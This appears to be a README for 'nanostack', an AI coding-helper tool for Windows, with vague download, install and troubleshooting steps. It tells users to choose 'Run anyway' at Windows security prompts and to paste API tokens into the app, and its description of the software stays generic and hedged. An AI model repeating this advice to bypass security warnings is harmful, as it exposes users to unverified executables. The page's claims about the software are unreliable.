⚙️ nanostack - Keep Your Coding Work Organized

Download nanostack

🚀 What nanostack does

nanostack gives you a small set of AI coding helpers for the full engineering workflow. It helps you move through common tasks like planning, coding, review, and security checks with less friction.

Use it if you want a simple way to:

  • break work into clear steps
  • get help with code changes
  • review code before you share it
  • check for common security issues
  • keep the workflow steady from start to finish

💻 System requirements

nanostack runs on Windows and fits best on a standard desktop or laptop.

You need:

  • Windows 10 or Windows 11
  • An internet connection for setup and AI features
  • Enough free space to save the app and project files
  • A modern browser if the release uses a web-based setup page

For the best experience, use a machine with:

  • 8 GB RAM or more
  • A recent Intel or AMD processor
  • Admin access if Windows asks for it during setup

📥 Download nanostack

Visit the release page here:

Download nanostack from GitHub Releases

On that page, look for the latest release and download the Windows file. If there are several files, choose the one for Windows.

🪟 Install on Windows

After the file finishes downloading:

  1. Open your Downloads folder
  2. Find the nanostack file you downloaded
  3. If it is a .zip file, right-click it and choose Extract All
  4. Open the extracted folder
  5. If it is an .exe file, double-click it to start the app
  6. If Windows shows a security prompt, choose Run anyway only if the file came from the release page above

If the release gives you an installer:

  • open the installer
  • follow the on-screen steps
  • keep the default install path unless you have a reason to change it

If the release gives you a portable app:

  • place the folder where you want it to stay
  • open the main .exe file inside that folder

🧭 First start

When nanostack opens for the first time:

  1. Read the main screen
  2. Enter any setup details the app asks for
  3. Connect the AI service if needed
  4. Pick the kind of work you want to do
  5. Start with a small task first

If the app asks for a key or token:

  • copy it from your service account
  • paste it into the field
  • save the settings before you begin

🛠️ How to use nanostack

nanostack is built for the full engineering workflow. A simple way to use it is:

  1. Plan the task

    • describe what you want to build or fix
    • keep the request short and clear
  2. Create the code

    • ask nanostack to help with the first version
    • review the output before you save it
  3. Check the change

    • use the review tools to inspect the code
    • look for simple errors and missing steps
  4. Audit the security

    • run a security check before you ship
    • look for weak input checks and unsafe patterns
  5. Finish the work

    • test the result
    • make small changes if needed
    • save the final version

🧩 What nanostack includes

nanostack focuses on a few key skills that help you move through a project with less confusion:

  • AI coding help for writing and changing code
  • code review support for checking work
  • security audit checks for common risks
  • workflow skills for planning and finishing tasks
  • support for steady handoff between steps

These skills are built to work together, so you do not need to jump between many tools for basic engineering tasks.

📂 Typical use cases

You can use nanostack for:

  • starting a new app
  • fixing a broken feature
  • checking code before a commit
  • reviewing changes from another person
  • looking for security problems in a small project
  • keeping your work process neat and repeatable

🔧 Basic troubleshooting

If nanostack does not open:

  • check that the download finished
  • try running it again from the extracted folder
  • make sure Windows did not block the file

If Windows says the file is unsafe:

  • confirm that you downloaded it from the release page
  • remove the old file
  • download the latest release again

If the app opens but does not connect:

  • check your internet connection
  • confirm any key or token you entered
  • restart the app and try again

If the screen looks empty or broken:

  • close the app
  • open it again
  • if needed, download the newest release from the link above

📌 Tips for a smooth setup

  • Use the latest release from GitHub
  • Keep the download in a folder you can find later
  • Start with one small task before using it on a larger project
  • Save your settings after setup
  • Update the app when a new release appears

🔐 Security

Use the app only from the release page linked above. Keep your Windows account protected with a strong password. If you use an access key or token, store it in a safe place and do not share it with others

🖥️ File types you may see

Depending on the release, you may see one of these:

  • .exe for direct launch
  • .zip for a compressed download that you must extract first
  • .msi for a Windows installer

If you are not sure which file to use, choose the Windows file that matches the latest release and follow the name and file type listed on the release page

🧪 What to expect after setup

After setup, nanostack should let you:

  • open the main workspace
  • enter a task or prompt
  • get help with code and workflow steps
  • review and refine the result
  • move through a project with fewer handoffs
